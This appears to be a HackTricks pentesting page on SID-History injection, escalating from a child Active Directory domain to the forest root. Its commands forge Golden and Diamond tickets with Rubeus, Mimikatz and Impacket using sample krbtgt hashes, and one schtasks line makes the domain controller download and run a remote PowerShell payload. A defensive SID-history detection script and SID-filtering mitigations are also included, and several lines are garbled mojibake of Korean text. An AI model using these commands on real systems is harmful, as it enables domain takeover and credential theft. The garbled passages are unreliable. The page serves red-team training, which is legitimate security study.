SID-History Injection

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

SID History Injection Attack

The focus of the SID History Injection Attack is to aid user migration between domains while ensuring continued access to resources from the former domain. This is accomplished by incorporating the user's previous Security Identifier (SID) into the SID History of their new account. Notably, this process can be manipulated to grant unauthorized access by adding the SID of a high-privilege group (such as Enterprise Admins or Domain Admins) from the parent domain to the SID History. This exploitation grants access to all resources within the parent domain.

There are two methods to execute this attack: through the creation of either a Golden Ticket or a Diamond Ticket.

To find the SID of the "Enterprise Admins" group, you first need to find the SID of the root domain. Once identified, the Enterprise Admins group SID is constructed by appending -519 to the root domain SID. For example, if the root domain SID is S-1-5-21-280534878-1496970234-700767426, the resulting SID of the "Enterprise Admins" group is S-1-5-21-280534878-1496970234-700767426-519.

You could also use the Domain Admins group, whose SID ends with 512.
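The RID arithmetic above, plus the defender-side check that follows from it, as an added example (not code from HackTricks): a SID parser that rebuilds a group SID from a domain SID and RID, and a function that flags sIDHistory (or PAC ExtraSids) entries pointing at a privileged group of a domain other than the account's own, which is exactly what an injected history looks like. The root domain SID is the page's; the child domain SID and the history entries are constructed.

```python
import re

# Well-known RIDs of the privileged groups this page discusses (512, 519),
# plus Schema Admins (518), another forest-wide group worth flagging.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SIDs are S-1-5-21-<three sub-authorities>; a trailing number is the RID.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

ROOT_DOMAIN_SID = "S-1-5-21-280534878-1496970234-700767426"      # from the page
CHILD_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed


def split_sid(sid: str) -> tuple[str, int]:
    """Split a domain account/group SID into (domain SID, RID).
    Raises ValueError for non-domain SIDs such as S-1-5-18 or S-1-5-32-544."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid}")
    rid = m.group(1)
    return sid[: -len(rid) - 1], int(rid)


def group_sid(domain_sid: str, rid: int) -> str:
    """Build a group SID the way the page does: domain SID + '-' + RID."""
    return f"{domain_sid}-{rid}"


def suspicious_sid_history(account_domain_sid: str, history: list[str]) -> list[dict]:
    """Return history entries that name a privileged group of a *foreign* domain.
    A legitimate migration carries the user's old account SID; another domain's
    admin-group SID in sIDHistory or in a ticket's ExtraSids is the injection pattern."""
    findings = []
    for sid in history:
        try:
            dom, rid = split_sid(sid)
        except ValueError:
            continue  # well-known / builtin SIDs are out of scope for this check
        if rid in PRIVILEGED_RIDS and dom != account_domain_sid:
            findings.append({"sid": sid, "group": PRIVILEGED_RIDS[rid], "foreign_domain": dom})
    return findings


# Constructed sIDHistory of a child-domain account: one benign migrated SID,
# one injected root-domain Enterprise Admins SID, one builtin SID (ignored).
SAMPLE_HISTORY = [
    "S-1-5-21-4444444444-5555555555-6666666666-1105",
    group_sid(ROOT_DOMAIN_SID, 519),
    "S-1-5-32-544",
]

if __name__ == "__main__":
    for f in suspicious_sid_history(CHILD_DOMAIN_SID, SAMPLE_HISTORY):
        print(f"ALERT: {f['group']} of {f['foreign_domain']} in history ({f['sid']})")
```

The same check applies to the PAC of a forged ticket: the SIDs passed via /sids or -extra-sid land in ExtraSids, so a 519 or 512 RID under the parent domain's SID on a child-domain account is the signal to hunt for.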

Another way to find the SID of a group (e.g. "Domain Admins") in another domain is:

Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid

Warning

SID history can be disabled on a trust relationship, which will make this attack fail.

According to the documentation:

  • Disable SIDHistory on forest trusts using the netdom tool (netdom trust /domain: /EnableSIDHistory:no on the domain controller)
  • Apply SID Filter Quarantining to external trusts using the netdom tool (netdom trust /domain: /quarantine:yes on the domain controller)
  • Applying SID Filtering to domain trusts within a single forest is not recommended, as it is an unsupported configuration and can cause breaking changes. If a domain within a forest is untrustworthy, it should not be a member of the forest. In that situation it is necessary to first split the trusted and untrusted domains into separate forests, where SID Filtering can be applied to an inter-forest trust.

Check this post for more information about bypassing this: https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-4

๋‹ค์ด์•„๋ชฌ๋“œ ํ‹ฐ์ผ“ (Rubeus + KRBTGT-AES256)

The last time I tried this, I needed to add the /ldap argument.

# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap /ldap

# Or a ptt with a golden ticket
## The /ldap command will get the details from the LDAP (so you don't need to put the SID)
## The /printcmd option will print the complete command if later you want to generate a token offline
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid>  /sids:<parent_domain_sid>-519 /user:Administrator /ptt /ldap /nowrap /printcmd

#e.g.

execute-assembly ../SharpCollection/Rubeus.exe golden /user:Administrator /domain:current.domain.local /sid:S-1-21-19375142345-528315377-138571287 /rc4:12861032628c1c32c012836520fc7123 /sids:S-1-5-21-2318540928-39816350-2043127614-519 /ptt /ldap /nowrap /printcmd

# You can use "Administrator" as username or any other string

Golden Ticket (Mimikatz) with KRBTGT-AES256

mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"

/user is the username to impersonate (could be anything)
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<NTLM of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.

# The previous command will generate a file called ticket.kirbi
# Just by loading it you can perform a DCSync attack against the domain

For more info about golden tickets check:

Golden Ticket

๋‹ค์ด์•„๋ชฌ๋“œ ํ‹ฐ์ผ“์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” ๋‹ค์Œ์„ ํ™•์ธํ•˜์„ธ์š”:

Diamond Ticket

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$

์†์ƒ๋œ ๋„๋ฉ”์ธ์˜ KRBTGT ํ•ด์‹œ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฃจํŠธ ๋˜๋Š” ์—”ํ„ฐํ”„๋ผ์ด์ฆˆ ๊ด€๋ฆฌ์ž์˜ DA๋กœ ์ƒ์Šน:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local

schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"

schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"

ํš๋“ํ•œ ๊ถŒํ•œ์œผ๋กœ ์ƒˆ๋กœ์šด ๋„๋ฉ”์ธ์—์„œ ์˜ˆ๋ฅผ ๋“ค์–ด DCSync ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

DCSync

From Linux

Manual with ticketer.py

# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"

# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator

# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS

# Load ticket
export KRB5CCNAME=hacker.ccache

# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10

Automatic using raiseChild.py

์ด๊ฒƒ์€ ์ž์‹ ๋„๋ฉ”์ธ์—์„œ ๋ถ€๋ชจ ๋„๋ฉ”์ธ์œผ๋กœ์˜ ์ƒ์Šน์„ ์ž๋™ํ™”ํ•˜๋Š” Impacket ์Šคํฌ๋ฆฝํŠธ์ž…๋‹ˆ๋‹ค. ์Šคํฌ๋ฆฝํŠธ๋Š” ๋‹ค์Œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

  • Target domain controller
  • Credentials for an admin user in the child domain

ํ๋ฆ„์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

  • Obtains the SID of the Enterprise Admins group of the parent domain
  • Retrieves the hash of the KRBTGT account in the child domain
  • Creates a Golden Ticket
  • Logs into the parent domain
  • Retrieves credentials for the Administrator account in the parent domain
  • If the target-exec switch is specified, it authenticates to the parent domain's Domain Controller via Psexec

raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
